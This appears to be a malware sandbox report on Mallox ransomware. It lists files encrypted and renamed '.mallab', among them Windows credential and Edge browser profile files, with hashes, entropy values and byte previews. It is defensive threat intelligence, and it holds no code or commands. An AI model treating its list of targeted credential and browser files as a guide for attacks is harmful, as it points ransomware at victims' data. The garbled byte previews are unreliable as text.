                    SHA-512:0289BE4FDFE4D390E3C69201DAD98B2BE0AFB80DC264DAA5C6C015C66614EC2052FF839DEC7C35927CD1C699CDCE389B35DEE87D48D7954B926CFAAB453A24FE
                    Malicious:false
                    Reputation:low
                    Preview:.A.UN+..r.@....!.f...>......DW.5...)#..&>........:l..?!..~g#.i.!8....^+f.g.,...}G(V..C...Kq.........x.n.wB..._O.74z%..M.o..K..vAD....w..kO..Z3.F'".c3.{..Pd..~.}.bdR..0r...{G..,N.#B...k)z`0.z*....\\...{O.r....}f....``....3.\tMsd.i"].V..O8..[u.........r...L.......d.?......!.....z.GXU..am[.*BQ..-k....b&r.......S..&..I.,yp.J........e....m.a{.[..".n.5.... ..t.N..........).@DF:os...9..)...4...?........{......M.sl6..>B... .8.@.W...)..Q.i........h.n<.x...%1`..g..M&z.oB(@.2...3(..Q..`:$..;n.........$..O...$.W.c*F."vSv.^Cb.Q.....hK.r...5v..5Xcd...r..?..CS.[..=....X...tD.*......:p.]..{.g.0.{....V.....h1c...(f..5H...\..|..E.I"z..'.{...$...I..]E..#....vh..._....)O.#2.7tJ.R..l.EL.8.Kk~.:.m0.............1.Y...1...S.\..W_..p.......B...B{....@.....<x.X..>.d.dR...;....wM.........:..R.......w1>.DQ....)(p.qO5.)....{.U....).%o....ArGFP..@Z.}Uj..w.k.O..y..B:k.....Qw......c...5y.|.....g..8..A&d|..^[mh{81I[........C.4z.........4.v.{...&GI.O.t.I.i.jg8. .......

                    C:\Documents and Settings\user\Local Settings\Comms\UnistoreDB\USSres00001.jrs.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):3145836
                    Entropy (8bit):7.999943484589841
                    Encrypted:true
                    SSDEEP:49152:UGObMtIvqPcM7C59OiI5Iw2fULOHFEeMIk4Q34CtHJOHw1IjgbwYsiBB5L:Ux0IyPcMYq5IwqU8Es2HYHwvszK5L
                    MD5:3C65270DED8D07ED1670A08636715522
                    SHA1:75BD79B5FA95B83CAD1CDD206DA1768FE3666AFB
                    SHA-256:5EF11493630C1B0E63DDC3B479EA0752034CC60578CC32131B49F30C90D72C2F
                    SHA-512:E54E5C51BAD79F4C7EB878ECCDB3F05948F57CB14255D6E24CB82BD61759CE7CD7D6F5FC01D63F211977D6329D33084FD3A07CD0AB6F38D959FC2426BC1B8EB6
                    Malicious:true
                    Reputation:low
                    Preview:..d......./.?..'.:/D.q.v..P.#l.W.......Ym.>.W..*c.B.\.....".i/7v..T.1..k.(.^m4H.w.s.m.vC.....n.p.x....u.1..2L.Y...6.@.$...F.!.....bekwn..o.."...v+..sX..)D.X..........^...(b..-....z....uTg...5t.*y...[.....(.>._L'.....l.@..dd....Ud..D.h...$..c.F.Xrw[.`?..\*Xy.q.$%...n?2...<*.$.s..4g,\D..bp. p*..5..=.a..G....bt..Y9.f..s...F.g....pL...r.B..dg[..<?.n..G.{..x.P..r...xZ.]..#U..o.z=.^.a$....*R..\.<.F..&3-...P..m....p..zU>.6.4...X..4....x9......1.?.-D..q......I..V..a..tm.>.:.."5.{..........A.".>'xx..V.W...2.'.$...Qw.<B...>..w..*N.N.m..U.P..h-p....M....%WD.W...z/...f..:~...........=.."@.]a..Y2..u+\X.!.B.%.0...............*..^.O/Y...^..... ,.9.q.s...Y:.} ..].9j.L...e+.QXF._.E_Q....NW.:(..wz.7k.P@.W...G4...q..8.q...]1....B]..K|0.u......y~.Q.M:\u ....:.1..PJ.].K.].T...[...Lb...<.0.2.p.y...#.UA..(1.V .u)..8....W.4D......SYB.....;`.g.. ..e D..2S.......g3...)e,,Yb.Y.....gS..j.W..,.7O.?.5..*.J....Ty......-...#{t5....K.[..A^\ .t..O.o^...H..=.......L.F8}Q.

                    C:\Documents and Settings\user\Local Settings\Comms\UnistoreDB\USSres00002.jrs.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:OpenPGP Public Key
                    Category:dropped
                    Size (bytes):3145836
                    Entropy (8bit):7.999940723965446
                    Encrypted:true
                    SSDEEP:49152:d2n1NfKv7m8GClo3tml1zPZle3W2GZheCHCykR+BVL11uZOvmZMbCADUTrxhkkdh:d2nnfE7M3tmhIW2G7Viy7vm2bJSsDn6
                    MD5:DE69E7ED664C2E008219C2B7477E0487
                    SHA1:81429AFEA8B87F9953BCF0D683D104668953435C
                    SHA-256:B702C07DDCB5AE954D23405D9146EAC4A381E41FCF890A75242846B88210674D
                    SHA-512:53AD3502DAF593855BDD883F06945F754FEDBB1BA6D3F106214F693A7C50097D06A7FB2CC411FCE5DFE950325EF5F274B18D4F5EFC589D9099FF3DA8C2F7FC26
                    Malicious:true
                    Reputation:low
                    Preview:. .....[. .,.....e.t:.....X.I..+..R}'....-......=..C..>@...X......?J:'.<.....$.%.cv#..;l.B...QT.J.9...."...z&.a..=~_.`R.=*d..Ca.P{5.U..vv.O...F..(...][b.X..7..S&C..xQ....g|...>..v..... .,..O}.. ...2.....G]...9Hf.H...L+l...M..X.L.PE.#;..?*.4.0.....)NoT..B....;....%..9..........F..z."b..]..6L..-.n..`Oj....R...l.%..N..BY....E.M..>mEK...[.Jy?<{r.:E-.Q%.)'.^.r~.6!..U.....?..tUj(..Q32k.fS.......*.2..<.a...N...o.*.....e.I....[.....C..`C.Bp.I...6.IN..;L....U.u~(...h\...\/]O..V..<...p..o..........2\`o.L.......?^.mrxUf...._$.jS.C@z.P.....zE....u....^>....F..g...|....P...'..THh...&.."m6.'.....,x....'Z....3..C..N ...k.h...YK..U.V...".G...W.n.$...E`.~..e.]|..B.}+...p3......5R.{..v...I..s.^t..D.\..5......|...j.6c.B....}.pP..._./.vfj.6.,B...]..kZ..nD.%..D|"....f..j..LY...o ........l..'Su..b....5......I...B.~..}......u..Pp.....w#^...>.[g./.v..u........../:Pe...QB8..H..F...]C}....yt.f......]....Z.h......Z..GZ.......~<..Y6..OO.d..+Jv'J..vi...d..

                    C:\Documents and Settings\user\Local Settings\Comms\UnistoreDB\USStmp.jtx.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):3145836
                    Entropy (8bit):7.9999425912960795
                    Encrypted:true
                    SSDEEP:98304:kV4xy33Q0G6ah5BRSbVVhcS9PZgHx+Hrstx:WvA0G6ah5HSpSRmrstx
                    MD5:2FD49F47F036882F868AE6DFDE161673
                    SHA1:6C488EDDBA49D088A1A61C3EFC8C5BB4409D6552
                    SHA-256:8F71A5413994436E49B89FB01B95D00DD0FCBB7C22A3F94C6250DFAE944B6C27
                    SHA-512:EB62F886D7731B7F1102C84DA0C9E4E35838644A9936C99B5E27A8262617155ED9449CAFD1933E22527201F116B54AFA8A18B51F79064F27DC66D6038CCD2BC6
                    Malicious:true
                    Preview:.Si.^7....g...........,...^.F....?c<....m {t(.D.y.7...@H^Q.....".5G.H..]....k7&w.......t~.y.OA...il...s.A..>!.........9.S..}.V..x*...I-v...3./...`.......+.&..K.6..._.'......m|.DN.OAT.......f#i...x..?9.-.\..k.j..`O......>gh,:..Q...d(z.]G....j......&...>...z......|g.d.=....*,....v..FE....3.e.v@..6...6..u..j..i.:OW.x...y.Tb^...y..X$.[..'#.{.Mo.1 z.\.s....+...p$............6..r.....<(..uD..p.QU#,Tp...&*.3.,..Z.{. `....K.>..iY._..........~{y.....:.P........qo.)..J/..{.....\.=..lx...p...8.#L..S...);*....D....z._.$...{P.B.S.......eB..yxa?..4\E(}..&.rELz.m..$].]G....`...0.....v78....kB.'.l<I.t..b.7..j...~%*..[....W..g._M....W?-.......n..iV....b.(^.y.......}..mEU[*Z"5.|..O..!..'/..*...2.A.o.6..t.. ..xe..+......a..4.G J'nDS...U.Po....q#....aG.......>.YI..T.....m...et.../...@T......v.8M.KT23l"....&...N8-m.j..y..>.....4f;..'......S.w.j.um.v...M.:....:=..Xf..L...l...1!..M.*..5.....FaS(.*..>.5.m&m..`O........#....{..w~.6..kG.]..P...f.o.(..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):11212
                    Entropy (8bit):7.983432249280393
                    Encrypted:false
                    SSDEEP:192:D0FXdZnmHJDOzTfa00BHbyiglTpB2pDb3DPJUgUOssMVsyWfPhXIPWIA:GSJDOzTi00BOlL2p4OssMVsyWfPhPIA
                    MD5:F946E0B72A68F36044B37411CDFB8A6E
                    SHA1:299843AC923E5FC7D822DEEF77EF7A36B31C5458
                    SHA-256:EC68D029BF844793A086B6F56BDFC6F34C7203D41168B2C3F712B54B239C57EA
                    SHA-512:69DB5F0AE297D6041A291997844A03204C15DEFE71C91A3A3657EE6DFEA5EBDE2AEAB7BF5EBCAA25A68AD6484BC8B6E3FFFEEA7AC31FE5EFBC993BB9B8A8D0BD
                    Malicious:false
                    Preview:!./.N.....L.R.....x......U.s.=k....?.|.O..N...V/.....'N.}...^e..c.Scd..l.."..J.X..l....6; .......-.uX.....2....N>....auU......^.c/.E..}.....9.1..x.Y.....(.C........x.V.....A..|.p?.X....9...8.....':.q./Z.Uc.G...f.<.%..".r..T..~.........%....".X.gf.}..T..3.@..v7....]5.2.;..sE.I.C..c...v...V...N..`.0b.....D....4~.Wyx......I.l#..E.[.}.q..CT...+94.....Ld.J....x..LD.c.....$........;.O3...Q.y'f;....W..D\l...k..oZ6..n...&h.q3....7....~.R.lB7.V......x].._....w-.2..D#.\C...a.]UL.u.sdc...2.E{..<.5..O.:............'u&}j(...:.d....q..,....H..:@GKx$......n.n..'.N.t_.....$.....u~..R.I[.:...m+u.N..... .p...U.cNgm...k.....p........|m....F.......&...S.m6o..lA...\.@..X< .......V......uH=.../..1....TN..1......I....O.s. M..!...'..37T.et..k.b....y...({......)..o.........4.....]..\:.Z..}...<J,..a....&...E.ea...R7...l).Z[6Jk......D7Z.(.......4..D%M.|.../...T...M[."..bje.C...q...z.....n.........S.s:......V.r..5....C._..;Q.b....HSp...N(y.n..a....".6X..s%.......

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Ad Blocking\blocklist.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):94442
                    Entropy (8bit):7.997903006328152
                    Encrypted:true
                    SSDEEP:1536:UwHRIhiswOXQqBFkoWpIHY+h+GE6gePowTrYagLZ+uZ8iK7XsnA0zxAtEZugW:NyJwOXQWkoWi4f6gy/vqpGo1DuJ
                    MD5:4A43540D9F6C39CC29EB5E82B91C0639
                    SHA1:347B3E990541164653343638DC8EB00C8231FFF3
                    SHA-256:17E299B815CF6D2476CE94F84DC0A1386A09664E8133A2EDC0C1D5B989B082C8
                    SHA-512:4E9072ADC58B778943882275FF3BC08FC3D3C0456EA1C1A885C9628B00A7E04ECB86481DF03C4CC3A21C8140FFCE44D26E639A7CA001E5BD5B21C4B3041DDDE8
                    Malicious:true
                    Preview:......bR~.....ysA.]N..P..._.-@.i.(.g..t"..C...*dxkf..I...v.%8. .]......U....6h...]....x.2..By.0W._6%+2Y.(.B.".E.....hh..[e......n......#..!Q.w.p.W..o./.8........u..Z5...X~.k.}.....:.;.#.U.....$.L%N.q..4.&.)....]..?.&..i.e...&..Y...Sx"...'R"5K..b)....{L..y....).U.3.r..e....c...L.H.h.....}.%..*.Z..,...xB..Xb.F....7b."FTP.<.F.%j.G.h..b....,r.M>*..jT....'...Bx.&..%.C`.[..B..m*.m+3.@...#..+0lx...!..J!%..I9...v1n..7d.w........0....Q..Jy.A..(...>..,6h.G.....%F..V>.x.^.2...I....R....i.V..*p.*....v..l.(.]'..i3(.......".....X.....RS.ja...A...~..J.5.=^nR......Ji.:P:.....IQ.N.}5...Ki.....>.8.....Q.......+..x...m,..1....{zaw#...w.=^G.i..]u.h.8......K<.O.0>$..5...1..L%..../..$..?w..F....u..a.....#/77t.\..?...]..W..*..|.a...x..1.z...h..w...|i.=$.7.n.U.]..IO..^........3g..V.,.5OA.RA}....Y2N.".'.:=T.B..DL.W.,W&.....]..Y..w4.u...s.37...9hi....K...$..B..QN.M..8k.x...7..e.......`M)..k.UH.[\.v...}.9..G_..".7..X.@v.o^...;$U....O.....\\\....FP

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Autofill\4.0.0.8\edge_autofill_field_data.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):217832
                    Entropy (8bit):7.999238668236431
                    Encrypted:true
                    SSDEEP:6144:+TvsEcfWMONu3bNgdJFO94X7o/CBJP887f1OiD5ffbdlh3jE7:nbTR36dJgWLwup8UfounbdHzE7
                    MD5:CDFBD29AABFCB0805620D0F27596FB5F
                    SHA1:D172AE673E00C92469FA4769C6F21AA3965445F9
                    SHA-256:A1A743D1D4FF723E1503143A2F400964B5B0BB9D38D5696E441FA4311176C7CC
                    SHA-512:B07649AA8F442393FC472EB5CC63886B98F52A1A180998CF3679E71712C7EDC46E2DA061C452B337F2961D972015E34FD0751785B5E419CF2605E2DC64F29BDC
                    Malicious:true
                    Preview:..2.Jq...+..*..B...t.Q..\n..._..<.`.Lcn_y&.m.a lb....!...Y.C..>.8...B.}...Q.d.Y.prfp.J..r.z..`p...9.G.$.-(G ".+..<..%...D.hyk-.~.&'..7..<Z/.t.aldf|..s.....l..c....q.....R.-.m....n.MU,e-.1...X_T.Ik:.._..........:O\k<......Ca.;..Ff....#.K.H...b.V..l.,B.yh..._.K3B...........%..%f.7.|...~.^....y'=.C....9.. WK.D..rw.|.U}...m#.1 .M.a......<7'..rl....,F..E.6.H...-....4Q+cm....yK..i&M\......._.@.5...b..iI.^...zo....a.b._..........I....jI.).r...JC;.G...........)a....N.k...j..M.X.i'Bm.-..ab..FAwMT...y...._.:...t....c..w......{I.KL...B7..'.....7.9eTp.)K;0.+@......)k...8......Rub...M....Ba|6.?..6...B.,h...).)3....|.C....$.S.9.C.~.0...Z..8...L.m{q..$..1t....y+R.m..v....h8u.f<.k....uG.h=M}.%...8qq...\.....Wv'../>.7).:2..=.[.*v.5P...... ..]...IT.2^..m..Hc...k.2.9..).x._.........<..es].eR..L.0V..I.Tv....K.....80..c.6@.`f.....jQ..`..)L..Hv.>.M.N..T..6l.....}!....J..?9;.z%?.c...i...r..v\.I............n3E.(0.E.U.|.[ 3.~.bo.".w....,).m....S.w..z0.u...v...A7oM

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Autofill\4.0.0.8\v1FieldTypes.json.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):519916
                    Entropy (8bit):7.999651233187555
                    Encrypted:true
                    SSDEEP:12288:HxiZj9juUbAi6Kr2oneSJ64ang/DCG8y6YkgnIz62b:HUJxtkfe64ag/2G8y6WSb
                    MD5:274A0B548F679B5ABFAC15D0C5B58D34
                    SHA1:E67B13149341DBD745E7F10A2A45D8CD01C6AA0D
                    SHA-256:8CCCF9826F6506EFFD9D7C1B7E1B3F5431EA61D38E28E93B221886DFC8571217
                    SHA-512:8E2AA22B1F4B1CE940850F06B572C06B508655DAFE4CA9681C54852B5CB4019D7B5C3E0FF2EFB4B0D2322A47F9BE72AEF7C79D89A7C43A82982B1F3D27B69DD9
                    Malicious:true
                    Preview:~v>....,p..0O....S..Zq\_f%k.........0._........a..e....q.M.;0.b.......l.j..l...@(....r......Y....BJr..v.j.7.T.2},5%......OV.."...5.b...XA..."...],..z.(...C...r6..=g..[...C^s.Rkj@Ba...[fu.^.g..wy^..t.{vK.+..y^X..@...8.ZI...(..W3R+...Z.h@XR.G .....[.y4...U...-.*.......;A...@.T....._...i.....9.L:.m...c...7D&#@L.#J./C1^...!..EA).Jm(..d|x......t@....r..%5..Y.H/...."..BX....$....;.9T....+{-!.#.|5........%.}}L.J.H'.|....p.K..3..w3...VM...]-...*...uyO..?..Lk.g.l...h7..H.. gW25....^S%.....:.Y.k4,.o..:8(.(.T..F...]t..._.s...+8..].._OD..E..n...1......N...{$..3..$I.J..]el.;t/Hz.|..,n..5.......rXB-..W.s>.....y.....x.4.a..p....7..gP....v..I.?P>........x.y......c3.....T{......8.y.sy...W............C.....e..t.s.=y/.k.d..=..N$.3.:...2.....g..St$.P.N}..M..WN....>.r..N.......[)..&..;..#s*Gw......\.......G..2.s[.}.....1....M.=....s..q.......=ZY..g..f..".....5.).\L.t....'\..=.h......7..<0..f....$../....t....O:Zp.........w..n..\G..*.T->....J.....=....V.s..HV..

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E8F64-1910.pma.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4194412
                    Entropy (8bit):7.999956721615571
                    Encrypted:true
                    SSDEEP:98304:yCP8C4oD9AfjgIfGfpZyy9+ldsBUh+q0DO9zuQ95cxDpJ/xh:yTrohAfj0hZyy9+jsGhkO9KQv+nxh
                    MD5:5786792C107FAC4D3F0C3AC49847380B
                    SHA1:A277F237ED6D2C51F0564DA58CE7C3CFB14056DC
                    SHA-256:EF10295F1A1D005C2D05916035C732AEF1A2A81B12CF92560AD94380C82A0350
                    SHA-512:594D89483FA6D52FD7FA63F0E0CF609313AA8B262E255F510381AE0E1EA9C5EF21C0606AB93D188D259475B91757226CC6BA39A57506B2FEEA2FD19501FFAEC0
                    Malicious:true
                    Preview:.1W.....Q$.....-..6..A.KX...l..nZ.....|..c...cl..\1....z....R.`...Z.*h..N..?(.:.'Q{.p1J...p......E#.O.....cKU..&..,.....I...m.....V... 'K.z......a....WSt).1A?...c/.9..9..8..QZY.H...|.......l....=.X...[....r..=R.0..UO..n......G......"....0K..s,sh....X.tT..X!.._.1...%..X....P2.'...Lm..W...`O!..!,.G.......>.W...FLWL..%....`....H.....6$.'..(C..[...;...y...|+..."~Y.I../|&6..wv...R-U..c.....7*Tf.....gE..+=....6..c........o.5L.S....N @O.d...4.e..=.k.j..$`........8...=+.aA.H.c.M5O.h0..=...<N.6!.o....<X[..*v.[.,.OTo6.....v.j)..=C...=...&..5....}.....T.X.z.e.y..l.}.zS...4.<J...9.:L-..w._.=C....@...9c..4.H.oUN..e..X.}.].%..%.%.y.....X.q....`..Q.#..8..e..Z.....km.-.n..4....}......}..S.}N.q.}Y..B.."..\..L...o..Il.....Wf.i..E....j.b..P...S.\.v;....]...g.[R.[.....]u}...x....7......f..['fPO.......a.7.{..I...C..k~+....WK.tz..mBt.sBiJ.W..i.^..[......L..t\........m..@_r.R..a.q..'...`.W1..N...HJ.9g...kU..K2...1.zE.ZD.\.....d...w|cl.........@...R..9......;.-..]k....

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E902E-1634.pma.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4194412
                    Entropy (8bit):7.9999536842634855
                    Encrypted:true
                    SSDEEP:49152:gOhpueJ9aHWFZuiqA2S7A8PUDL0veWsF9e4pEEOCUUzckj3xMClTYppsbRy1g2km:FgqKOqS9+vM4pdOMJjHl4qbwTZu2
                    MD5:3D4F4D8047401CFBD0BA3846A43F706F
                    SHA1:D1749A7D55ACD1E53E081FCCA3266212F7C05F75
                    SHA-256:2FC5BCACE03AD85913CEEDDE459329C624DCA9260F5F9D079F1279CD846E7E9A
                    SHA-512:392964D9648A65E4682FFA469BBA308F05BAB578DBD7E222EED9325B1D4678473CB402CA6AF7D619F2EBF7FD7476BEA941B2CB6246C9CB706C5DA026E9B7EA58
                    Malicious:true
                    Preview:q.T^mc.D.%..[.!R..d.UZ....*.+0.j..dc.m.....P......\......M.m..<)...~.~L~../q..n-.........l.W!...E..x.:...aoA.....f1....C.w.F..[.A...].Y5|U.J%'._......Np..]...I....,..B.Iv.I.....)]V#....m..p...o......Z.0 .X..2i3.....cb..rS=n..Z.di.?..FD.G|......iT..|....?.....2Cs.f..J%.7:.XW..;4.........*.&.i...U.\.I..C.^...c.E..8|....t....bG.h.#.f.I..rw....m...x.].......3._1.Nc..4..|H?....ym#6..^...m7..5..I....O.f.U>.w....`.JIO.:.$...W...f5.D/..rU....v.||e..{.....P..~.>*.X9..6,..eW....P..B......1?.).t..|..5h5.,....H..*}..s.........R&..iH|.6(h..`.%.....Zx...k."hf..X.\..."U *..)|GY|...v...%".R]K....a&._..{....2..,\".b....^.+).t..;..~......ed2_,*!I.P...r...w.:.....'.....Z......C....r..1.$.y......P.@.8...d......u...k.....:u._..(3.... ....S%I..w.u3...ReS.f.....(...y..+...I.^JZ.l..Ab.o.~...m.. ..c.-M7#.,R1Q.].......l2.|.<.C[..,.V&...\5..-..N_.....'\...n.|.8Z:X...A.7...W.$ ..;H.O.......H..\..~..:[..x.7."...K..9&.#..[.......dg..Y2......P....V.B.#d.#....2.}.M...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-651E9065-1B98.pma.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):4194412
                    Entropy (8bit):7.999952871749424
                    Encrypted:true
                    SSDEEP:98304:qmjFbpPYUgT6IulnK7mCd9KWS1f4QMUn9gjNxwVR1fpCdKB:rPPYUgTxanA9KcVU9INxgR1fsdKB
                    MD5:380161468FE1E0F941368E9F9E7C5E9B
                    SHA1:C87210CED8BD60F00FFFE3F26BCCA5DB76678E39
                    SHA-256:D877BC804B6FCAD50B32FEFAC93A1FB0413E748C343B2F42C8B493CB319FE8D9
                    SHA-512:892D5960ACD0BFA8D4C18DBF0A83DECC893E55557DBB0F3B79B3AA139EE915177CFD8B85C9FB1317FF77C2F73BE83FE02855CFFBE96BA58234029B46A2958611
                    Malicious:true
                    Preview:...pi..?..r_...........^...=..:.w...,4o...D......X...R9.....[....%.t..&+. .t.....R.>......3Y6...u...VkX.KX6,...{\v^.G".h....k}.Dg..h.p..K.o.....+P/./...M]MP........:v......<..9..WC'I.j.$..4...K.../)=......Yv~.I..qs.L .);...W..@4.M....#.x...%]i...II#...j.c..y........fH./.Oo...F..a=.55...c.N...w.;{.A.x...u.i?h1.E.9.S+."./n.`.=).U....5".d.....2.c.......t......R]J.X..=.......D....u{=.....J,...5.S.4T..~..[I*.H..i.-.....)...@O.i...[.~.u.......M...*..4...M...........xK..;...9..?.0...!....,Si.lqoM.,..y...N..U.\.X.... ....B..s...6.A..N.Gpr.y0...k.!?...).M.... ..q.*......u;tn.1...V....p.#.&67z..:.5e9&...D......Ex..PL.".r..Rs.M>.1.E..._.2.F..`.Q"...<......_..K...|../.i....uk/......bU..JUvk.=..H..e.......B.X..W.j^f........Ef......$n0?.EW.r....j.......kcm.SZ.O_.......l\..:..qao..>e..b.f...`eT=CJ........./8HD..O'N....f.<.....n.+T......#0.Ta.%.).....Fi....n...-.....t..u...N`....`.u..vj.8*q.....}.)S....^P.\.f......y\.0.O.>...lFU..L...b..3...2_.~.._..mo+.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1\crl-set.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):22573
                    Entropy (8bit):7.992096164351853
                    Encrypted:true
                    SSDEEP:384:0xwpifVlBd7o7dbt3waP+iXwOwe/enOz62lZFXUu6JbXC9BrV78nxPxY7U2eDv:/IzoxbiaPtwOwOUilZ6pbmBUxpYYX
                    MD5:C42AD827D6DA4690E3B724029707C5F9
                    SHA1:6A8C601F3B3EE544E984A8762A82FDA255F64054
                    SHA-256:BD494370FC0E38A12AC36A27A391F6C2C38D137B1C073512C6B70306C4480DE8
                    SHA-512:C856457920867925BF656092F510672CC1CD03DB43FE3A474EC0FB25A22F03146324F1A792836EFC150C5CC8DB628E5AD72CF3F5275B1E3E1C8E997BF7848050
                    Malicious:true
                    Preview:.Z"...$J|..N...X\.n....._3.I.t....8.L.xcMuO....n....W!ayu2...e..n>~.]%.....s.v....s.q....K.UY....5..K..^...?.6.>C.RdF.[X....- Bn......@a.%8.........b...E.:....d./...=R...Q.)../ .,..+.:.$.b..b...v...m).6.O..m\~.|}|...)VZ.....?.......G]....+......v..<.....7.V.P..I7.O....(?~D...T7....R..'.3..0.[....A......>.n......n.8.7&./...{.P..(...1O#..Y..E....ZY....h...u.T.N..;@.....0D.&....$..%.+.....oi....M.A.._......N1n. ..@.N..N...n_V".....a.w.o...~.I..[}._.,....l\...........u6|wO,B.n}..f...'.)Z..i....E2>.@..j*y...."...x......KY@.}......&......=..4..hQ..!aS9..].p`C..GB"c..p'N.w..Srx&1Bu.q+:.D..y....Y)..v...0`3.'FM/..T.T...E2.N.V.qv.b.7..ZN........?....HP..*......5.m...f.....C.W2..)..7c...).../..w....-/.MoS^-,^1..Z...Ude.w^s.,O...z..[..[.....{b.'`...%._.U=.i.../.>.`F_.-.6....<*6...,......:t.Q/.......%;...O~^.....K.\...L....V.I.|...P.|-Q.{....k..0.@...3..`-.P.....G..1. ....!p.....A....1.e..t....C...f.A>V)4...X..................cD...

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):480302
                    Entropy (8bit):7.999595809105567
                    Encrypted:true
                    SSDEEP:12288:Po/C9soKGuuE51tS8wKDp/ML3nm1pNyZw4m7okHi/9:w/CTIYKc3ny7yY7okH0
                    MD5:F8B607463083FAC6AD2032A0E7C37F90
                    SHA1:2162866FC38EA959EB80F62474674A7CD0BBF817
                    SHA-256:03DB3F2E70A884C43A8EF1116D639A29FE2FF00BB675231AC0863A45F0A3DFBF
                    SHA-512:D548CFF5343CFA75002F2D98411FB1569457FD7468E8D6707E38869AD59EFA7E80FE2AD7A97582325791B2C6331218045ADAC0EAEFAFDDDBDA35370040F6172C
                    Malicious:true
                    Preview:^.;L.C..lU..(3......r..JO..u..s.8........R.......o..3.IoH.z./.-..a..L|...U...@d.K.....{..Lo.]D..e..C......8V...Q..`4.s.@B.U......r.o>5.}A..'.S...o..c.......8N..(*xy...s..R....J......i1......j..9.RC..0>...s.=.R|n.y.5<.{..&...,.(.............*..w.?...?.X.k...1..#..%..`d.?...]...Z.2..^;/..@..L@.q.....:...h..7......&Y.7W.2......,........hs..Le.d.....t@!?....D{..........T0...}....p...J.&.ZT..S.>`....=..\...5. .!.J.@.mZ.3.:...r.Yp.....\Z..<..4.FBxKX.=l.....ygD.............7p..J..SZ ....W.f.Ae...2....Nf..ZF$..5...5B....M.^.....u..;.F@....r{...V.<..Z....'.>...P.........E..h..yM..c...>.....m4F{].t..q..h......R.*.Z.l.q.....B..MKX..aC........E.u..K.&PL..}.......=.zX...;..M.{.Yj/.@O...N.1....7.$D.R;..] .......cD..z.pp.....%...{..J.......u.."".jC....@T:@g.RD4.\..F...B.%...;.....m.:>...SC6ak.I..&..g..^&...#.c.7_.....|.i..7.4.....q+......n.N.b.Q........a_Z..J>....v>|.T%..W2..?&@...........n.~.+..A.c..9....,,)..74l..HG...^....>^..#...{Va....rt..>..f...:..8.

                    C:\Documents and Settings\user\Local Settings\Microsoft\Edge\User Data\Default\AssistanceHome\AssistanceHomeSQLite.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12396
                    Entropy (8bit):7.9853070518483085
                    Encrypted:false
                    SSDEEP:384:Od4F1KVSA3aLX4D2r4gHCUCC6YIpBIy73+N0TRZodQ:Odxjaj4yrl/q1Poa
                    MD5:294B1CA03F6AF0CB69BCDF78F105254E
                    SHA1:2605BC408FBB984193A034C35186006A368FBE47
                    SHA-256:4FC288954BF8778AC55A041800740DF1A1BE0A2C86E23F1938334378A824CED4
                    SHA-512:6C15F58ECAD67B0B23B00F7F73482D4A816CDAFA3B9F5D7EA8CAAD29825BB2A5AE6CF03B830A8D2863D01C1C0C5EDCDC8EB01CAB4F4E8F6A9C71D3404EB21A3E
                    Malicious:false
                    Preview:.B..N.<.tO.T`e...8E........_....-..e..$=d/[>K(..5-@.......g.W6....(..c.ECd..'n.`]k..)....K.r^j.H~.*.{I.%t.<...m.7.......e)~.+.mN....S.R9....W......vE.x......,t.......G....`.QQ.+f.j...[.Dyo.....y....4..?-......f,.Pu.. ...............<...\.....s.~..\GL#......l1.3).:a..C..p...o...>..j.;.h....e.........lU..P.....g.. ...Y.....v.z.4.b..*.......nF..pba@.:...........{0Bw.K...s.8..I...s/..5.\.;.*.950@9i.n.&..^..`..{L...D......8..n.[.m9....*:2.R....L....9.&.)6.t.e.bK.V.j...e.....1..O..@!....u......^.o....SN4&..E.m3.B5...DG.U..<-G....y...r.............6..(..=T...;.*N..Y...X.S.~\k.{..........K".~...x...NO.^/.E....f....d...W..Q..G_c...,.F...>s.e$Z.n.......>...*{zL......Y..P.a.7EQ. 